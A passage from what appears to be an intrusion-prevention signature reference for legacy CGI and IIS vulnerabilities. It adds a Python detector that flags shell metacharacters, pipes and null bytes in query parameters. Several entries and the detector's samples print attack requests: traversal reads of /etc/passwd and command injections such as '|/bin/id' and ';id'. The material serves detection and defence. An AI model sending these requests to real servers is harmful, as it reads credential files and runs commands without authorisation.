being able to access the system. SGI IRIX 6.4, SGI IRIX 6.3, SGI IRIX 6.2, and SGI IRIX 5.3 are vulnerable.
Signature ID: 84
Home Free search.cgi directory traversal vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0054 Bugtraq: 921
Signature Description: Home Free is a suite of Perl cgi scripts that allow a website to support user contributions of
various types. In Solution Scripts Home Free 1.0 one of the scripts, search.cgi, accepts a parameter called 'letter' which
can be any text string. The supplied argument can contain the '../' string, which the script will process. This can be used
to obtain directory listings and the first line of files outside of the intended web filesystem. It is possible to read
arbitrary files on the remote server by requesting: GET /cgi-bin/search.cgi?letter=\\..\\..\\.....\\file_to_read. An attacker
may use this flaw to read arbitrary files on this server.
Signature ID: 86
Access to vulnerable cgi 'htdig'
Threat Level: Warning
Industry ID: CVE-2000-0208 CVE-2001-0834 CVE-2000-1191 Bugtraq: 1026,3410 Nessus: 10105
Signature Description: The ht://Dig system is a complete world wide web indexing and searching system for a domain
or intranet developed at San Diego State University. The 'htsearch' CGI, which is part of the htdig package (ht://Dig),
suffers from many flaws. It allows a malicious user to view any file on the target computer by enclosing the file name
with backticks (`) in parameters to htsearch (CVE-2000-0208). htsearch program in htdig 3.1.5 and earlier allows
remote attackers to use the -c option to specify an alternate configuration file, which could be used to (1) cause a denial
of service (CPU consumption) by specifying a large file such as /dev/zero, or (2) read arbitrary files by uploading an
alternate configuration file that specifies the target file (CVE-2001-0834). It also allows remote attackers to determine
the physical path of the server by requesting a non-existent configuration file using the config parameter, which
generates an error message that includes the full path (CVE-2000-1191).
Signature ID: 87
Access to vulnerable cgi 'htgrep'
Threat Level: Severe
Industry ID: CVE-2000-0832 Nessus: 10495
Signature Description: Htgrep allows you to query any document accessible to your server on a paragraph-by-paragraph
basis. It can search plain text, HTML and Refer bibliography files. It is a set of cgi-bin scripts written in Perl.
The Htgrep CGI program allows remote attackers to read arbitrary files by specifying the full pathname in the 'hdr'
parameter, e.g. http://www.example.com/cgi-bin/htgrep/file=index.html&hdr=/etc/passwd.
Signature ID: 88
Htmlscript cgi access vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0264 Bugtraq: 2001 Nessus: 10106
Signature Description: Miva's htmlscript CGI program provides a unique scripting language with HTML-type tags.
Versions of the htmlscript interpreter (a CGI script) prior to 2.9932 are vulnerable to a file-reading directory traversal
attack using relative paths (e.g., "../../../../../../etc/passwd"). An attacker need only append this path as a variable passed
to the script via a URL. The contents of any file to which the web server process has read access can be retrieved using
this method.
Signature ID: 91
File reading attempt by prefixing file name with "~nobody" vulnerability
Threat Level: Severe
Nessus: 10484
Signature Description: It is possible to access arbitrary files on the remote web server by prepending ~nobody/ to
their name (as in ~nobody/etc/passwd). This problem is due to a misconfiguration in the HTTP server that sets UserDir
to './'. Apache server and lighttpd server < 1.4.19 are known to be vulnerable.
Signature ID: 92
Microsoft IIS 5.0 Translate Header Source Disclosure Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0778 Bugtraq: 1578
Signature Description: Microsoft IIS (Internet Information Services, formerly called Internet Information Server) is a
set of Internet-based services for servers using Microsoft Windows. Microsoft Internet Information Server (IIS) 5.0 is
vulnerable to source code disclosure when an HTTP request comes with a Translate header field and a backslash '\'
appended to the end of the URL. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as
ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, process them accordingly, and
then execute them on the server. When a request is made as above, the scripting engine will be able to locate the
requested file; however, it will not recognize it as a file that needs to be processed and will proceed to send the file
source to the client. Apply the appropriate patch for your system, as listed in Microsoft Security Bulletin MS00-058.
Signature ID: 93
ICat Carbo Server File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1069 Bugtraq: 2126 Nessus: 10112
Signature Description: ICat Electronic Commerce Suite is an application which enables a user to create and manage
web-based catalogues. carbo.dll in iCat Electronic Commerce Suite 3.0 allows remote attackers to read arbitrary files
via directory traversal using relative paths. It is possible to access any object on the system. Successful exploitation of
this vulnerability may disclose sensitive information such as usernames and passwords and aid in the development of
further attacks.
Signature ID: 94
Access to IIS 5 Internet Printing Protocol ISAPI extension (.printer) vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0241 Bugtraq: 2674 Nessus: 10661,10657
Signature Description: Windows 2000 has native support for the Internet Printing Protocol (IPP), an industry-standard
protocol for submitting and controlling print jobs over HTTP. The protocol is implemented in Windows 2000 via an
ISAPI extension that is installed by default as part of Windows 2000 but which can only be accessed via IIS 5.0. At
least one security problem (a buffer overflow) has been found with that extension in the past. The attacker could exploit
the vulnerability, which results because the ISAPI extension contains an unchecked buffer in a section of code that
handles input parameters. This could enable a remote attacker to conduct a buffer overrun attack and cause code of her
choice to run on the server.
Signature ID: 96
Microsoft IIS IDQ/IDA File Request vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0071 CVE-2000-0098 CVE-2001-0500 Bugtraq: 1065,2880 Nessus: 10492
Signature Description: This signature detects an attempt to access .idq, .ida or .htx files via an HTTP request. Microsoft
Internet Information Service (IIS) 4.0 installs several Internet Service Application Programming Interface (ISAPI)
extensions. The .idq ISAPI filter provides support for Internet Data Queries and is used to implement custom
searches. The .ida ISAPI filter provides support for Internet Data Administration and is used to manage the
indexing server. Both extensions make use of Microsoft Indexing Server, and both are installed by
default with IIS 4.0. When a remote user requests a non-existent .ida or .idq file, the real pathname of the document root
is revealed by the Indexing Server error messages that are generated for the request. This information may be used by
the attacker in further attacks.
Signature ID: 99
/iisadmpwd/aexp2.htr access vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0421 CVE-1999-0407 Bugtraq: 2110,4236 Nessus: 10371
Signature Description: Microsoft IIS is a popular web server package for Windows-based platforms. Version 4.0 of IIS
installs a remotely accessible directory, /IISADMPWD (mapped to c:\winnt\system32\inetsrv\iisadmpwd), which
contains a number of vulnerable '.HTR' files. There are two known vulnerabilities. (1) These files were designed to
give system administrators the ability to provide HTTP-based password change services to network users. The
affected files are achg.htr, aexp*.htr, and anot*.htr. Requesting one of the listed .htr files returns a form that requests
the account name, current password, and changed password. (2) These files can be used as proxies for brute force
password attacks, or to identify valid users on the system. If the account does not exist, the message "invalid domain" is
returned; if it does, but the password change was unsuccessful, the attacker is notified. This can be used against the
server and against other machines connected to the network (LAN or the Internet), by preceding the account name with
an IP address and a backslash, for example '192.168.1.10\Administrator'. The server contacts the networked machine
through the NetBIOS session port and attempts to change the password.
Signature ID: 100
Iis_bdir cgi vulnerability
Threat Level: Warning
Bugtraq: 2280 Nessus: 10577
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Version 3.0 came
with a series of remote administration scripts installed in /scripts/iisadmin off the web root directory. Version 3.0 of IIS
had an ism.dll file containing an authentication scheme to prevent unauthorized access. If an IIS 3.0 installation is
upgraded to IIS 4.0 without removing these scripts, they can be accessed remotely without authentication due to
changes in the authentication methods used by IIS 4.0. One of these scripts, bdir.htr, can be used in IIS 4.0 server by a
remote attacker to obtain information about the server's directory structure. The script displays only a listing of
subdirectories of the directory specified as part of a request. This information about the server's directory structure
could potentially be used in further attacks.
Signature ID: 101
Microsoft IIS/PWS UNICODE Characters Decoding Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0333 Bugtraq: 2708 Nessus: 10671
Signature Description: Microsoft IIS 4.0 and 5.0 have a vulnerability in the filename processing of CGI programs. When IIS
receives a CGI filename request, it automatically performs two actions before completing the request. First, IIS decodes
the filename to determine the file type and the legitimacy of the file. IIS then carries out a security check. Once the
security check is completed, IIS continues with the second action, which involves the decoding of CGI parameters. The
flaw in IIS involves a third, undocumented action: IIS should decode only the CGI parameters at this point, yet the
previously decoded CGI filename is mistakenly decoded a second time. If a malformed filename is submitted and circumvents
the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the
execution of arbitrary commands.
Signature ID: 102
IIS dot cnf cgi vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1718 CVE-2002-0241 CVE-2002-1717 Bugtraq: 4084,4048,4078 Nessus: 10575
Signature Description: Microsoft IIS is a popular web server package for Windows-based platforms. A misconfigured
IIS web server may allow remote users to read sensitive information from .cnf files. These are configuration files, used
by Telnet, Windows, and other applications, with varying internal formats. For example: http://target/_vti_pvt/svcacl.cnf.
Microsoft IIS 5.1 was reported with this issue.
Signature ID: 104
IIS perl.exe problem
Threat Level: Warning
Industry ID: CVE-1999-0450 Bugtraq: 194 Nessus: 10120
Signature Description: Microsoft IIS is a popular web server package for Windows-based platforms. It is possible to
obtain the physical location of a virtual web directory of this host by issuing the request: GET /scripts/no-suchfile.pl
HTTP/1.0 in Microsoft IIS 5.0. An attacker may use this flaw to gain more information about the remote host,
and hence make more focused attacks.
Signature ID: 105
/scripts/repost.asp access vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0360 Bugtraq: 1811 Nessus: 10372
Signature Description: Microsoft Site Server is an Internet-based commerce (or e-commerce) solution from Microsoft.
Microsoft's Site Server 2.0 allows users unrestricted access to the /users directory and its contents with default settings.
The file /scripts/repost.asp allows users to upload files to the /users directory. Even if the directory does not exist, any
valid user can create the directory.
Signature ID: 106
IIS vulnerable sample files access
Threat Level: Warning
Nessus: 10370
Signature Description: Microsoft IIS is a popular web server package for Windows-based platforms. Any web site
running Internet Information Server 3 or 4 with sample IIS files (IDQ, ASP and HTW) is vulnerable. Using these files
it is possible to break outside of the web virtual root and gain unauthorized access to files, such as log files and in certain
cases the backup version of the Security Accounts Manager (sam._). The files are fastq.idq, query.idq, query.asp (all in
the '/iissamples/issamples/' directory), search.idq, query.idq (all in the '/iissamples/exair/search/' directory), codebrws.asp (in
the '/iissamples/exair/howitworks/' directory), qsumrhit.htw and qfullhit.htw (both in the '/iissamples/issamples/oop/' directory).
Signature ID: 107
IIS vulnerable sample files access
Threat Level: Warning
Nessus: 10370
Signature Description: Microsoft IIS is a popular web server package for Windows-based platforms. Any web site
running Internet Information Server 3 or 4 with sample IIS files (IDQ - Internet Data Query) is vulnerable. Using these
files it is possible to break outside of the web virtual root and gain unauthorized access to files, such as log files and in
certain cases the backup version of the Security Accounts Manager (sam._). The files are author.idq, filesize.idq,
filetime.idq, queryhit.idq and simple.idq (all in the '/scripts/samples/search/' directory).
Signature ID: 108
/scripts Directory accessible from external network vulnerability
Threat Level: Warning
Nessus: 10121,10039
Signature Description: The IIS '/scripts' directory is accessible from an external network. Microsoft IIS is a popular web server
package for Windows-based platforms. The directory '/scripts' is used to store multiple executable scripts used by the
website deployed on IIS. If access is given to view the contents of the folder, an attacker can gain valuable information
about which default scripts or vulnerable custom scripts are installed. No vulnerable scripts should be present in this
directory, and the directory permissions must be set appropriately.
Signature ID: 110
NT IIS4 /iisadmin Remote Web-Based Administration Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-1538 CVE-2000-0630 Bugtraq: 189 Nessus: 10358
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. If IIS4.0 was
installed as an upgrade to IIS 2.0 or 3.0, a DLL file (ISM.DLL) is left in the /scripts/iisadmin directory. An attacker
may use this DLL as in 'http://example/scripts/iisadmin/ism.dll?http/dir'. This URL prompts the user for a
username/password to access the remote administration console. Although approved access does not permit the user to
commit changes to the IIS server, it may allow them to gather sensitive information about the web server and its
configuration.
Signature ID: 111
OmniHTTPD imagemap.exe Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0951 Bugtraq: 739 Nessus: 10122
Signature Description: OmniHTTPd is an all-purpose industry compliant web server built specifically for the Windows
95/98/NT4 platform from Omnicron Technologies Corporation. In addition to Standard CGI support, the server sports
features such as Keep-Alive connections, table auto-indexing and server-side includes. Omnicron OmniHTTPD 2.4 Pro
and Omnicron OmniHTTPD 1.1 contain a CGI called 'imagemap.exe' which is vulnerable to a buffer overflow that
allows a remote user to execute arbitrary commands with the privileges of the http server (either nobody or root).
Signature ID: 112
IMP Session Hijacking vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0857 Bugtraq: 3525 Nessus: 10801
Signature Description: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web
applications which allow code injection by malicious web users into the web pages viewed by other users. Horde IMP
is a powerful web-based mail interface/client developed by members of the Horde project. It is written in PHP and
provides webmail access to IMAP and POP3 accounts. All releases of Horde IMP Webmail prior to version 2.2.7 are
vulnerable to a cross-site scripting attack which can be used by an attacker to hijack a victim's IMP session.
Signature ID: 113
Info2www CGI Input Handling Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0266 Bugtraq: 1995 Nessus: 10127
Signature Description: The info2www script allows an HTTP server to serve information stored in GNU Info nodes.
GNU Info nodes are hypertext documents developed for the Emacs editor which together form multi-page
documentation for users of a command line interface. They can be viewed locally using the 'info' utility. The info2www
script version 1.1 or prior fails to properly parse input and can be used to execute commands on the server with the
permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful
exploitation involve anything the web server process has permissions to do, including possibly web site defacement.
Signature ID: 114
SGI InfoSearch fname Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0207 Bugtraq: 1031 Nessus: 10128
Signature Description: The InfoSearch package converts man pages and other documentation into HTML web content.
IRIX is a computer operating system developed by Silicon Graphics, Inc. to run natively on their 32- and 64-bit MIPS
architecture workstations and servers. A vulnerability exists in the 'InfoSearch' package as included by Silicon Graphics
in their IRIX operating system. In SGI IRIX 6.5.7 or prior, the search form uses 'infosrch.cgi', which does not properly
parse user input in the 'fname' variable, allowing commands to be executed at the web server privilege level by remote
web users, as demonstrated in 'http://target/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id'.
Signature ID: 115
InterScan VirusWall Remote Configuration Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0432 Bugtraq: 2579 Nessus: 10733
Signature Description: Interscan VirusWall is a virus scanning software package distributed and maintained by Trend
Micro. It is designed to scan for virus occurrences in both incoming and outgoing traffic via SMTP, FTP, and HTTP at
the gateway of the network. Buffer overflows in various CGI programs in the remote administration service for Trend
Micro Interscan VirusWall 3.0.1 allow remote attackers to execute arbitrary commands. Additionally, the HTTP daemon
used to execute these programs runs as root, allowing a user to execute them directly.
Signature ID: 116
JJ sample CGI program Escape Character Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0260 Bugtraq: 2002 Nessus: 10131
Signature Description: NCSA HTTPd was a web server originally developed at the NCSA by Robert McCool and
others. JJ is a sample CGI program distributed with NCSA HTTPd servers. Rob McCool jj.c 1.0 on NCSA httpd 1.5.2a
or earlier passes unfiltered user data directly to the /bin/mail program, and as such can be used to escape to a shell using
the ~ character. The attacker must know the password the program requests, but by default the program uses
HTTPdRocKs or SDGROCKS. These default passwords must be changed in the program's source code. A successful
attacker can run arbitrary code with the privileges of the httpd server.
Signature ID: 117
Allaire JRun 2.3.x Sample Files Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0539 CVE-2000-0540 Bugtraq: 1386 Nessus: 10444,10996
Signature Description: JRun is a Java application server, originally developed as a Java Servlet engine by Live
Software and subsequently purchased by Allaire. A number of vulnerabilities in Allaire JRun 2.3.x allow remote
attackers to obtain sensitive information, e.g. listing HttpSession IDs via the 'SessionServlet' servlet, or file system
information via viewsource.jsp. This information can be used in subsequent attacks. The vulnerabilities exist in
documentation, sample code, examples, and applications as well as tutorials which are shipped as part of the server.
This signature detects access to the vulnerable viewsource.jsp file.
Signature ID: 118
Allaire JRun Directory Listing vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1050 Bugtraq: 1830 Nessus: 10604
Signature Description: JRun is a Java application server, originally developed as a Java Servlet engine by Live
Software and subsequently purchased by Allaire. The 'WEB-INF' directory contains metadata about the application
deployed on the server. Allaire JRun 3.0 http servlet server allows remote attackers to directly access the WEB-INF
directory via a URL request that contains an extra "/" in the beginning of the request as in 'http://target//WEB-INF/'.
This may also be exploited by submitting the maliciously crafted URL via a HTTP GET request using utilities like
netcat or telnet.
Signature ID: 120
KW Whois Remote Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0941 Bugtraq: 1883 Nessus: 10541
Signature Description: WHOIS is a TCP-based query/response protocol which is widely used for querying an official
database in order to determine the owner of a domain name, an IP address, or an autonomous system number on the
Internet. Kootenay Web Inc whois is a web interface to the 'whois' command on a Linux server. Kootenay Web Inc whois
1.0 does not check user input properly. Hence, using shell metacharacters like ';', an attacker can trick the script
into executing arbitrary code on the host system.
Signature ID: 121
Check for listrec.pl vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0997 Bugtraq: 3328 Nessus: 10769
Signature Description: Textor Webmasters Ltd offers a series of pre-packaged web content management solutions.
Textor Webmasters Ltd.'s listrec.pl CGI program allows remote attackers to execute arbitrary commands, via shell meta
characters like ';' in the TEMPLATE parameter, with the privileges of the web server.
Signature ID: 122
Lotus Notes ?OpenServer Information Disclosure vulnerability
Threat Level: Warning
Signature Description: Lotus Domino is an Application server designed to aid workgroups and collaboration on
projects and offers SMTP, POP3, IMAP, LDAP, and web services that allow users to interact with Lotus Notes
databases. Multiple versions of Domino Web server have a special URL, 'http://myserver/?OpenServer', which
generates a page containing a list of all the databases on the server. The database names are active links, so you can
open a database just by clicking a name. This is a convenient shortcut for administrators or designers working on a
Web site. The access settings for this URL can be either 'allow all' or 'allow no one'. An attacker can gain valuable
information if the access is given to this URL. Hence access to this information must be restricted.
Signature ID: 123
Endymion MailMan ALTERNATE_TEMPLATES File Disclosure vulnerabilities
Threat Level: Warning
Industry ID: CVE-2001-0021 Bugtraq: 2063 Nessus: 10566
Signature Description: Endymion MailMan is a web-email interface application written in Perl, commonly used on
Linux systems. A vulnerability exists in versions of Endymion MailMan Webmail prior to version 3.0.26. Affected
versions make insecure use of the Perl open() function on a user-controlled value, so an attacker who controls that
value can make open() run a command instead of opening a file. These commands execute with the privilege level of the
CGI script, and the flaw may allow remote attackers to gain interactive local access on the target server.
Signature ID: 124
Mailnews.cgi Username Remote Shell Commands Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0271 Bugtraq: 2391 Nessus: 10641
Signature Description: Mailnews is a CGI script that helps administrators operate a mailing list efficiently, among
other things by letting remote users subscribe to and unsubscribe from the list. mailnews.cgi 1.3 and earlier allow
remote attackers to execute arbitrary commands via a user name that contains shell metacharacters. A remote attacker
can add a new user to the mailnews user file with malicious shell commands embedded in the username field. When this
data is later displayed, the embedded commands execute with the privileges of the web server process.
Signature ID: 125
MiniVend Piped command vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0635 Bugtraq: 1449 Nessus: 10473
Signature Description: MiniVend is an e-commerce system originally developed by Mike Heins. MiniVend version
4.04 and earlier ship with a sample storefront that is vulnerable. The file VIEW_PAGE.HTML does not check user input
for a pipe character in the supplied filename, and UTIL.PM passes that filename to the Perl open() function to test
for its existence without any validation. A filename containing a pipe therefore causes open() to execute the
embedded command instead of opening a file.
Signature ID: 126
IIS ctss.idc access vulnerability
Threat Level: Warning
Nessus: 10359
Signature Description: Microsoft IIS is a popular web server package for Windows-based platforms. Microsoft IIS 3.0
contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue lies in the ctss.idc
example file, which does not sanitize user-supplied input. mkilog.exe is a Common Gateway Interface (CGI) program
that can be used to view and modify SQL database contents. It posts data to the vulnerable module, ctss.idc, which
creates a table based on the parameters passed to it. The Data Source Name, User ID, and Password must be known to
exploit this vulnerability.
Signature ID: 128
NT Options pack MDAC RDS Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1011 Bugtraq: 529 Nessus: 10357
Signature Description: Windows NT is a family of operating systems produced by Microsoft. The Windows NT
Option Pack is a set of web and application services that enables developers to create distributed network
applications for Windows NT Server. Microsoft IIS is a popular web server package for Windows-based platforms.
MDAC (Microsoft Data Access Components) is a package used to integrate web and database services. It includes a
component named RDS (Remote Data Services). RDS allows remote access via the Internet to database objects through
IIS. Both are included in a default installation of the Windows NT 4.0 Option Pack. RDS includes a component called
the DataFactory object, which has a vulnerability that could allow any web user to 1) obtain unauthorized access to
unpublished files on the IIS server, 2) use MDAC to tunnel ODBC requests through to a remote location, thereby
masking the source of the attack, or 3) if the Microsoft JET OLE DB Provider or Microsoft DataShape Provider is
installed, invoke the VBA 'shell()' command on the server with System privileges. In combination, these flaws allow
an attacker on the Internet to run arbitrary commands with System-level privileges on the target host. Microsoft IIS
3.0 to 4.0 and other NT-based web servers using the Windows NT 4.0 Option Pack without the update patch are
vulnerable.
Signature ID: 129
MS Personal WebServer directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0386 Bugtraq: 989 Nessus: 10142
Signature Description: Microsoft Personal Web Server (PWS) is simple web server software offered by Microsoft for
the Windows operating system; it was developed for Windows 9x and Windows NT 4.0. Microsoft Personal Web Server 4.0
or earlier and Microsoft FrontPage Personal WebServer 1.0 parse a '/..../' string in requested URLs as '\' on the
logical drive on which the site is hosted, allowing remote users to obtain unauthenticated read access to files and
directories on the same logical drive as the web content. The name and path of the desired file must be known to the
attacker.
Signature ID: 131
MultiHTML File Disclosure Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0912 Bugtraq: 6711 Nessus: 10516
Signature Description: MultiHTML is a web-based application for inserting Server Side Include calls that display
HTML files. MultiHTML 1.5 is prone to a file disclosure vulnerability: user-supplied input is not sanitized before
being passed to the Perl open() function. Remote attackers can therefore issue requests that disclose any resource
the web server can read. A valid file followed by a null byte (%00) must be requested to exploit this vulnerability,
as the null byte truncates the filename at that point.
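The three entries above (Endymion MailMan, MiniVend and MultiHTML), like the KW Whois, listrec.pl and mailnews.cgi entries before them, come down to the same defect: a CGI parameter reaches a shell or a two-argument Perl open() unchecked. The following Python is an added example, not code from this guide or from any of the products named. It percent-decodes each query parameter of an HTTP request line into the raw bytes the CGI would receive and flags the three indicators a signature engine looks for: shell metacharacters, a leading or trailing pipe, and an embedded null byte. The request lines and parameter names are constructed for the example and are not the real scripts' parameters.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Bytes that let a CGI parameter escape into /bin/sh when the script hands it
# to system(), popen() or a two-argument Perl open().  Newline is included
# because the shell ends a command on it just as it does on ';'.
SHELL_META = re.compile(rb"[;|&`$()\n]")


def decode_query(query: str) -> dict:
    """Split a raw query string into {name: value_bytes}, percent-decoding
    each value to the exact bytes the CGI script would see, so that %00 and
    %0a stay visible instead of being swallowed by a str conversion."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[name] = unquote_to_bytes(value.replace("+", " "))
    return params


def classify_value(value: bytes) -> list:
    """Return the injection categories a single parameter value matches."""
    hits = []
    if b"\x00" in value:
        # C-level string truncation: 'file%00.html' opens 'file'.
        hits.append("null_byte")
    stripped = value.strip()
    if stripped.startswith(b"|") or stripped.endswith(b"|"):
        # Two-argument open(): '|cmd' writes into cmd, 'cmd|' reads from it.
        hits.append("pipe_open")
    if SHELL_META.search(value):
        hits.append("shell_metachar")
    return hits


def scan_request_line(request_line: str) -> list:
    """Inspect one HTTP request line and return (param, category) findings."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    findings = []
    for name, value in decode_query(query).items():
        for category in classify_value(value):
            findings.append((name, category))
    return findings


# Constructed request lines modelled on the patterns above; the script and
# parameter names are placeholders, not the real products' parameters.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/whois.cgi?domain=example.com;id HTTP/1.0",
    "GET /cgi-bin/view.cgi?page=|id| HTTP/1.0",
    "GET /cgi-bin/show.cgi?file=/etc/motd%00.html HTTP/1.0",
    "GET /cgi-bin/search.cgi?q=hello+world HTTP/1.0",
]


def scan_all(lines=SAMPLE_REQUESTS) -> dict:
    """Map each request line to its findings (an empty list means clean)."""
    return {line: scan_request_line(line) for line in lines}


if __name__ == "__main__":
    for line, findings in scan_all().items():
        print(f"{line}\n    -> {findings or 'clean'}")
```

Decoding to bytes rather than str is the important detail: a signature that matches on the percent-encoded text misses `%2500`-style double encoding and alternative encodings of `;`, whereas matching on the decoded bytes sees what the script's open() or system() actually receives.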
Signature ID: 132
/book.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1114 Bugtraq: 3178 Nessus: 10721
Signature Description: NC Book is a guest book package for websites distributed by NetCode. NetCode Book
0.2b allows remote attackers to execute arbitrary commands via the "current" parameter by enclosing commands in
pipe ('|') characters. The commands run with the privileges of the HTTPd process.
Signature ID: 133
Tektronix Phaser Network Printer Administration Interface Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0484 Bugtraq: 2659 Nessus: 10665
Signature Description: The Tektronix Phaser network printers are a series of network-based printers with advanced
features such as web-based management. A remote vulnerability exists in Tektronix Phaser network printers in the 7xx,
8xx, and 9xx series. An attacker with access to the printer's local network can reach the printer's administration
interface, served by the built-in Tektronix PhaserLink web server. No authentication mechanism exists to validate such
connections, so arbitrary pages inside the printer's administration interface may be requested from the PhaserLink
web server. By invoking functions such as the printer's 'Emergency Power Off' or changing its IP configuration, an
attacker can cause a denial of service.
Signature ID: 134
Novell Web Server NDS Tree Browsing vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1634 Bugtraq: 4874
Signature Description: Netscape Enterprise Server was a web server originally developed by Netscape
Communications Corporation; the product has since been acquired by Sun Microsystems and renamed Sun Java
System Web Server. Netscape Enterprise Server for Novell NetWare 5.1 or 5.0 contains several sample files which leak
sensitive system information such as the location of the web root and detailed system-specific information. These
files are available to remote users and can thus assist attackers in subsequent attacks.
Signature ID: 135
Netauth CGI Access vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0782 Bugtraq: 1587 Nessus: 10494
Signature Description: NetWin Netauth is a web-based email management tool. NetWin Netauth versions 4.2 and
earlier allow a remote attacker to traverse directories and read arbitrary files on the server by supplying "dot dot"
(/../) sequences and the desired file name in the 'page' variable at the end of a request to netauth.cgi. This can be
used by an attacker to gain access to restricted information, which can in turn be used to compromise the system in
subsequent attacks.
Signature ID: 136
Netscape Enterprise Server PageServices Information Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0269 Bugtraq: 7621 Nessus: 10153
Signature Description: Netscape Enterprise Server was a web server originally developed by Netscape
Communications Corporation; the product has since been acquired by Sun Microsystems and renamed Sun Java
System Web Server. A vulnerability has been reported in Netscape Enterprise Server 4.1 SP8 and earlier. The problem
occurs while processing HTTP queries containing the '?PageServices' URI parameter. The affected server may disclose
the contents of the web root, possibly including sub-directories.
Signature ID: 137
Attempt to access /admin-serv/config/admpw
Threat Level: Warning
Bugtraq: 1579 Nessus: 10468
Signature Description: Netscape Communications SuiteSpot is a compilation of Netscape's web, mail, groupware, and
directory-server offerings for corporate networks. The Netscape SuiteSpot 3.5 server includes a web administration
package. The username and encrypted password for the Administrator account are kept in a world-readable file at
(webroot)/admin-serv/config/admpw. If an attacker retrieves this file, the password can be cracked offline by brute
force.
Signature ID: 138
Netscape FastTrack 'get' request vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0239 Bugtraq: 481 Nessus: 10156
Signature Description: When Netscape FastTrack Server 3.0.1 is issued a lower-case 'get' request, it returns a
directory listing even if a default page such as index.html is present. For example, 'get / HTTP/1.0' returns a
listing of the root directory. This allows an attacker to gain valuable information about the directory structure of
the remote host and could reveal the presence of files which are not intended to be visible.
Signature ID: 139
Netscape publishingXpert 2 arbitrary file disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1196 Nessus: 10364
Signature Description: Netscape PublishingXpert is a solution for publishers to author, revise, stage, deliver, and
manage their own online services. The PSCOErrPage.htm file in Netscape PublishingXpert 2.5 prior to SP2 allows
remote attackers to read arbitrary files by specifying the target file in the errPagePath parameter. An example
request exploiting this vulnerability is '/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd'.
Signature ID: 140
Netscape Enterprise Server Directory Indexing Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0236 Bugtraq: 1063 Nessus: 10352
Signature Description: Netscape Enterprise Server was a web server originally developed by Netscape
Communications Corporation; the product has since been acquired by Sun Microsystems and renamed Sun Java
System Web Server. Netscape Enterprise Server 3.0 to 3.6 with Directory Indexing enabled allows remote attackers to
list server directories via web publishing tags such as ?wp-cs-dump. This information can assist an attacker in
subsequent attacks.
Signature ID: 141
Newdsn.exe File Creation Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0191 Bugtraq: 1818 Nessus: 10360
Signature Description: Microsoft IIS is a popular web server package for Windows-based platforms. Microsoft IIS 3.0
ships with a sample program called newdsn.exe, installed by default in the directory 'wwwroot/scripts/tools/'.
Invoking this program via a URL can allow remote file creation. The file created is a Microsoft Access database, but
it can be given any extension, including .html.
Signature ID: 142
WEB-CGI newsdesk.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0231 Bugtraq: 2172 Nessus: 10586
Signature Description: Ibrow newsdesk is a CGI script designed to allow remote administration of website news
headlines. Ibrow newsdesk.cgi 1.2 fails to properly remove '../' sequences from user-supplied input to the "t"
parameter. An attacker can use this vulnerability to reveal the contents of any file on the filesystem that is readable
by the web server, for example the password file used by the newsdesk CGI script itself via 't=../pass.txt'. Such
information can then be used to deface the website.
Signature ID: 144
GroupWise Web Interface 'HELP' command vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1005 Bugtraq: 879 Nessus: 10877
Signature Description: The file GWWEB.exe is a dangerous file which can grant remote users read access to sensitive
files and file path information, as well as the ability to remotely execute arbitrary code with the privileges of the
web server. For instance, the request http://example/cgi-bin/GW5/GWWEB.exe?HELP=some_bad_request reveals path
information, and http://example/cgi-bin/GW5/GWWEB.exe?HELP=../../../../../../index lists .htm and .html files.
Signature ID: 145
Access to vulnerable CGI nph-publish.cgi
Threat Level: Severe
Industry ID: CVE-1999-1177 CVE-2001-0400 Bugtraq: 2563 Nessus: 10164
Signature Description: The nph-publish.cgi script allows Apache to "publish" files created with Netscape Navigator
